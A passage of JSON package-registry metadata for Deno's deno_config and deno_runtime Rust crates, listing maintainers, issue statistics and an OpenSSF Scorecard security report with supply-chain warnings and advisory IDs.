2,"forks_count":18.609789387164156,"docker_downloads_count":null,"average":18.56115249992949},"purl":"pkg:cargo/deno_config","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_config","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_config","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_config/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-06T13:00:35.403Z","issues_count":6650,"pull_requests_count":9667,"avg_time_to_close_issue":17138573.200682055,"avg_time_to_close_pull_request":1530522.5908357133,"issues_closed_count":3810,"pull_requests_closed_count":8052,"pull_request_authors_count":589,"issue_authors_count":2489,"avg_comments_per_issue":2.5046616541353384,"avg_comments_per_pull_request":0.7208027309403124,"merged_pull_requests_count":7030,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":673,"past_year_pull_requests_count":1190,"past_year_avg_time_to_close_issue":1344289.2103004293,"past_year_avg_time_to_close_pull_request":1305317.8687782804,"past_year_issues_closed_count":233,"past_year_pull_requests_closed_count":663,"past_year_pull_request_authors_count":190,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2332838038632987,"past_year_avg_comments_per_pull_request":1.134453781512605,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":496,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_config/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-08-23T14:10:43.387Z","updated_at":"2023-08-23T14:10:43.387Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-08-24T21:59:00.131Z","updated_at":"2023-08-24T21:59:00.131Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":1080037,"name":"deno_runtime","ecosystem":"cargo","description":"Provides the deno runtime library","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":272,"first_release_published_at":"2020-12-13T21:44:01.890Z","latest_release_published_at":"2026-08-27T15:22:24.849Z","latest_release_number":"0.266.0","last_synced_at":"2026-09-08T10:16:21.225Z","created_at":"2022-04-07T21:02:23.990Z","updated_at":"2026-09-08T22:16:13.539Z","registry_url":"https://crates.io/crates/deno_runtime/","install_command":"cargo install deno_runtime","documentation_url":"https://docs.rs/deno_runtime/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed 